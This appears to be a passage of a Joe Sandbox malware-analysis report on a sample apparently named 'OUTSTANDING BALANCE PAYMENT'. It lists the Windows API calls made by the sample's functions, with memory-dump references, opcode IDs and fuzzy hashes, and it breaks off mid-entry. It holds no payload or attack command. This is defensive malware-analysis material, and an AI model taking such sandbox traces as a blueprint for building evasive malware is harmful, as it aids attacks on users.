                                                                    • Part of subcall function 002C1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,002C0ABB,?,?,?,002C187A,00000000,000000EF,00000119,?,?), ref: 002C1E77
                                                                    • Part of subcall function 002C1E68: lstrcpyW.KERNEL32(00000000,?,?,002C0ABB,?,?,?,002C187A,00000000,000000EF,00000119,?,?,00000000), ref: 002C1E9D
                                                                    • Part of subcall function 002C1E68: lstrcmpiW.KERNEL32(00000000,?,002C0ABB,?,?,?,002C187A,00000000,000000EF,00000119,?,?), ref: 002C1ECE
                                                                  • lstrlenW.KERNEL32(?,00000002,?,?,?,?,002C187A,00000000,000000EF,00000119,?,?,00000000), ref: 002C0AD4
                                                                  • lstrcpyW.KERNEL32(00000000,?,?,002C187A,00000000,000000EF,00000119,?,?,00000000), ref: 002C0AFA
                                                                  • lstrcmpiW.KERNEL32(00000002,cdecl,?,002C187A,00000000,000000EF,00000119,?,?,00000000), ref: 002C0B2E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: lstrcmpilstrcpylstrlen
                                                                  • String ID: cdecl
                                                                  • API String ID: 4031866154-3896280584
                                                                  • Opcode ID: 671f196e7ed0de53040b36229043ce12e358e6feccc331775008ae90508e1e55
                                                                  • Instruction ID: b8ea71c8acc20357cdf9e0dbd87cc7e1f2c1fb579ce7a4572752d4d518965f0f
                                                                  • Opcode Fuzzy Hash: 671f196e7ed0de53040b36229043ce12e358e6feccc331775008ae90508e1e55
                                                                  • Instruction Fuzzy Hash: FB118136220305EFDB25AF64DC45E7A77A8FF49354F80416AE906CB251EB719C60C7A0
                                                                  APIs
                                                                  • _free.LIBCMT ref: 002B2FB5
                                                                    • Part of subcall function 002A395C: __FF_MSGBANNER.LIBCMT ref: 002A3973
                                                                    • Part of subcall function 002A395C: __NMSG_WRITE.LIBCMT ref: 002A397A
                                                                    • Part of subcall function 002A395C: RtlAllocateHeap.NTDLL(011E0000,00000000,00000001,00000001,00000000,?,?,0029F507,?,0000000E), ref: 002A399F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap_free
                                                                  • String ID:
                                                                  • API String ID: 614378929-0
                                                                  • Opcode ID: ece941010a6ac783a253ce4cd74608dda2448555bd5b58d7e0c3233d6f01a0f2
                                                                  • Instruction ID: 3613a009fbc5f685692b58f2416f7cc9d3887ab653164769911aa342a0d494b5
                                                                  • Opcode Fuzzy Hash: ece941010a6ac783a253ce4cd74608dda2448555bd5b58d7e0c3233d6f01a0f2
                                                                  • Instruction Fuzzy Hash: 0511E732529316ABCB227FB4AC046AA3B98AF153B0F204826F8499A151DF70C9708E90
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 002C05AC
                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 002C05C7
                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 002C05DD
                                                                  • FreeLibrary.KERNEL32(?), ref: 002C0632
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                  • String ID:
                                                                  • API String ID: 3137044355-0
                                                                  • Opcode ID: 269c8328e5496eaaa5cef8f820664ca6ecdd29906614e773419013641e126482
                                                                  • Instruction ID: 11d5882dea788441278c4e5c516b572c8595719e8cffbcbbc0860c3a7f2ed52a
                                                                  • Opcode Fuzzy Hash: 269c8328e5496eaaa5cef8f820664ca6ecdd29906614e773419013641e126482
                                                                  • Instruction Fuzzy Hash: 45215971911209EBEB21CF91DCD8FDABBBCEF40700F10866EA516A6050DBB0EA659F50
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 002C6733
                                                                  • _memset.LIBCMT ref: 002C6754
                                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 002C67A6
                                                                  • CloseHandle.KERNEL32(00000000), ref: 002C67AF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                  • String ID:
                                                                  • API String ID: 1157408455-0
                                                                  • Opcode ID: 12f5cb024f5756003f84c6e3c5684440758a19b0cbf80cac810b424916c02ea2
                                                                  • Instruction ID: d1a560fc21f97f139c082c7f9ab6a61e6f31aab78711f643e5158c76cfeaa941
                                                                  • Opcode Fuzzy Hash: 12f5cb024f5756003f84c6e3c5684440758a19b0cbf80cac810b424916c02ea2
                                                                  • Instruction Fuzzy Hash: 85110A76D012287AE7205BA5AC4DFABBABCEF44724F10469AF504E71C0D6744E848B64
                                                                  APIs
                                                                    • Part of subcall function 002BAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002BAA79
                                                                    • Part of subcall function 002BAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002BAA83
                                                                    • Part of subcall function 002BAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002BAA92
                                                                    • Part of subcall function 002BAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002BAA99
                                                                    • Part of subcall function 002BAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002BAAAF
                                                                  • GetLengthSid.ADVAPI32(?,00000000,002BADE4,?,?), ref: 002BB21B
                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 002BB227
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 002BB22E
                                                                  • CopySid.ADVAPI32(?,00000000,?), ref: 002BB247
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                  • String ID:
                                                                  • API String ID: 4217664535-0
                                                                  • Opcode ID: 412dd5d966c44897d4d88930bcbffbe670c839f21a13d6842099b5ce471544eb
                                                                  • Instruction ID: 827e9568dd6066b4404bfb28b7ca6b0564e0efbd2ce3ad378ebb8de77c0d6caf
                                                                  • Opcode Fuzzy Hash: 412dd5d966c44897d4d88930bcbffbe670c839f21a13d6842099b5ce471544eb
                                                                  • Instruction Fuzzy Hash: C011C171A10205EFCB059F98CCA5AEEB7BDEF84344F14802EE94297211D771AE54CB10
                                                                  APIs
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 002BB498
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002BB4AA
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002BB4C0
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002BB4DB
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: 48ea6a323fde4e6303b7667030a7ac1e3596fea41c4e0b262bc6d7919b5cc04c
                                                                  • Instruction ID: bc670ab65219cc78df0a5c0a99555ced8ec8bc22b2e0132c8e5a596b40db2984
                                                                  • Opcode Fuzzy Hash: 48ea6a323fde4e6303b7667030a7ac1e3596fea41c4e0b262bc6d7919b5cc04c
                                                                  • Instruction Fuzzy Hash: 05112A7A900218FFDB11DFA9C985EDEBBB8FB08750F204091E604B7295D7B1AE11DB94
                                                                  APIs
                                                                    • Part of subcall function 0029B34E: GetWindowLongW.USER32(?,000000EB), ref: 0029B35F
                                                                  • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0029B5A5
                                                                  • GetClientRect.USER32(?,?), ref: 002FE69A
                                                                  • GetCursorPos.USER32(?), ref: 002FE6A4
                                                                  • ScreenToClient.USER32(?,?), ref: 002FE6AF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Client$CursorLongProcRectScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 4127811313-0
                                                                  • Opcode ID: 2f6ee5f05f720aba0d45b85d5994848ce90a3f91d942b8079f5ec57abb447a45
                                                                  • Instruction ID: 4fee82db0cca4637ba3629db049bc88c7260fc170f43de0da432fcaca3f9c439
                                                                  • Opcode Fuzzy Hash: 2f6ee5f05f720aba0d45b85d5994848ce90a3f91d942b8079f5ec57abb447a45
                                                                  • Instruction Fuzzy Hash: F811363591102EBBCF12DF98DD459AEB7BDEF09304F820452E911E7150D774AAA1CBA1
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 002C7352
                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 002C7385
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002C739B
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002C73A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                  • String ID:
                                                                  • API String ID: 2880819207-0
                                                                  • Opcode ID: 3d43c6c32862d18fe745905fdd8fea020795f48742668644ad0c90e67a575589
                                                                  • Instruction ID: 5a33b5efe742e85249deb86668ab7413ca1f32607e1e6c360f5b273c3a566c05
                                                                  • Opcode Fuzzy Hash: 3d43c6c32862d18fe745905fdd8fea020795f48742668644ad0c90e67a575589
                                                                  • Instruction Fuzzy Hash: D511E176A14255BBC7029FA8DC05F9E7BED9B46320F04435AF825D32A1DAB099149BA0
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0029D1BA
                                                                  • GetStockObject.GDI32(00000011), ref: 0029D1CE
                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 0029D1D8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                  • String ID:
                                                                  • API String ID: 3970641297-0
                                                                  • Opcode ID: fac72a021f3b11d49e80a2cfc848512b3b9e0f1fab5f358b8d8e8624fa66e852
                                                                  • Instruction ID: 7bd3004d0555501de383165864ed2317a8c7f86d20de284ff019324d04ba9f14
                                                                  • Opcode Fuzzy Hash: fac72a021f3b11d49e80a2cfc848512b3b9e0f1fab5f358b8d8e8624fa66e852
                                                                  • Instruction Fuzzy Hash: 5A11AD7311250ABFEF024FA4DC50EEABB6DFF09764F050112FA1952060C771DC60ABA0
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                  • String ID:
                                                                  • API String ID: 3016257755-0
                                                                  • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                  • Instruction ID: 7e320560a0ea9234525e83239aa0761684337c26443643d0891c08ef87b3fd74
                                                                  • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                  • Instruction Fuzzy Hash: 76014B3202014ABBCF126E84DC81CEE3F62BB18390B588455FE1859132D336DAB1AB81
                                                                  APIs
                                                                    • Part of subcall function 002A7A0D: __getptd_noexit.LIBCMT ref: 002A7A0E
                                                                  • __lock.LIBCMT ref: 002A748F
                                                                  • InterlockedDecrement.KERNEL32(?), ref: 002A74AC
                                                                  • _free.LIBCMT ref: 002A74BF
                                                                  • InterlockedIncrement.KERNEL32(011F3920), ref: 002A74D7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                  • String ID:
                                                                  • API String ID: 2704283638-0
                                                                  • Opcode ID: 38bfcf80041cf6a0f4ef0eacc20c094b41123bbb03e555e5cbc5bca5cf747338
                                                                  • Instruction ID: 022e67f337847b6891b49fd6f4b4ca56a1ad5190fa9df5f7ff8ac4670f45904f
                                                                  • Opcode Fuzzy Hash: 38bfcf80041cf6a0f4ef0eacc20c094b41123bbb03e555e5cbc5bca5cf747338
                                                                  • Instruction Fuzzy Hash: 6101D63592AB12ABC713AF649C4975DBB70BF0A721F14401AF454A3681CF305921CFDA
                                                                  APIs
                                                                    • Part of subcall function 0029AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0029AFE3
                                                                    • Part of subcall function 0029AF83: SelectObject.GDI32(?,00000000), ref: 0029AFF2
                                                                    • Part of subcall function 0029AF83: BeginPath.GDI32(?), ref: 0029B009
                                                                    • Part of subcall function 0029AF83: SelectObject.GDI32(?,00000000), ref: 0029B033
                                                                  • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 002EEA8E
                                                                  • LineTo.GDI32(00000000,?,?), ref: 002EEA9B
                                                                  • EndPath.GDI32(00000000), ref: 002EEAAB
                                                                  • StrokePath.GDI32(00000000), ref: 002EEAB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                  • String ID:
                                                                  • API String ID: 1539411459-0
                                                                  • Opcode ID: c10f8cfe1d1bbb85cf1504f3802636ff11bce38b31ad57f38deafebabef27e3c
                                                                  • Instruction ID: 0a2133821069d85fe0f7a37b9b5b36981b9f445dec7b6fc0b0b184108b286782
                                                                  • Opcode Fuzzy Hash: c10f8cfe1d1bbb85cf1504f3802636ff11bce38b31ad57f38deafebabef27e3c
                                                                  • Instruction Fuzzy Hash: 17F0BE31042259BBDB139F94AC09FCA3F5DAF06310F044102FE01640E187789561CBD5
                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 002BC84A
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 002BC85D
                                                                  • GetCurrentThreadId.KERNEL32 ref: 002BC864
                                                                  • AttachThreadInput.USER32(00000000), ref: 002BC86B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 2710830443-0
                                                                  • Opcode ID: daacde840b32d83028d3a466e91268e99cee991acd63e22d900d0f9dfe7c61d4
                                                                  • Instruction ID: 5034aea306c4fd6c5d4a83bce998a37532a34e123104b42d50fa19bc20794acc
                                                                  • Opcode Fuzzy Hash: daacde840b32d83028d3a466e91268e99cee991acd63e22d900d0f9dfe7c61d4
                                                                  • Instruction Fuzzy Hash: 91E06D71142228BADB221FA2DC0DEDB7F9CEF067A1F408022B60D85461C6B2C590CBE0
                                                                  APIs
                                                                  • GetCurrentThread.KERNEL32 ref: 002BB0D6
                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,002BAC9D), ref: 002BB0DD
                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,002BAC9D), ref: 002BB0EA
                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,002BAC9D), ref: 002BB0F1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                  • String ID:
                                                                  • API String ID: 3974789173-0
                                                                  • Opcode ID: 81f4028ff608c9d6a7f85951d71a5668968088d0a18b2c79e76f19d88d9ac640
                                                                  • Instruction ID: ebb9f7bfa555af9cde88deba819dc4fd1f7dba41ac6e9bd252a6d3b58de0e686
                                                                  • Opcode Fuzzy Hash: 81f4028ff608c9d6a7f85951d71a5668968088d0a18b2c79e76f19d88d9ac640
                                                                  • Instruction Fuzzy Hash: A7E086726022129BD7212FF15C1CB973BECEF557D1F018819F245DA040DB748401C760
                                                                  APIs
                                                                  • GetSysColor.USER32(00000008), ref: 0029B496
                                                                  • SetTextColor.GDI32(?,000000FF), ref: 0029B4A0
                                                                  • SetBkMode.GDI32(?,00000001), ref: 0029B4B5
                                                                  • GetStockObject.GDI32(00000005), ref: 0029B4BD
                                                                  • GetWindowDC.USER32(?,00000000), ref: 002FDE2B
                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 002FDE38
                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 002FDE51
                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 002FDE6A
                                                                  • GetPixel.GDI32(00000000,?,?), ref: 002FDE8A
                                                                  • ReleaseDC.USER32(?,00000000), ref: 002FDE95
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                  • String ID:
                                                                  • API String ID: 1946975507-0
                                                                  • Opcode ID: 0bd69107ff75a7dc6f9c28a20ab117346923701782236d45742abf8e43624277
                                                                  • Instruction ID: d89872f78907dbf6c01a731ec0f5c8ecc3cf22fbd74305d25bb95164b8277704
                                                                  • Opcode Fuzzy Hash: 0bd69107ff75a7dc6f9c28a20ab117346923701782236d45742abf8e43624277
                                                                  • Instruction Fuzzy Hash: AEE06D31110245AADF221FB8BC1DBE87F55AB12339F00C267FB69580E1C7714590DB11
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2146816304.0000000000281000.00000020.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true
                                                                  • Associated: 00000000.00000002.2146802828.0000000000280000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000030D000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146861593.000000000032E000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146897956.000000000033A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.2146913617.0000000000344000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_280000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  • Opcode ID: a03bfce4cfc9edb49f07c97bab121b588885ec301b346f9645a18e5d04f8d74f
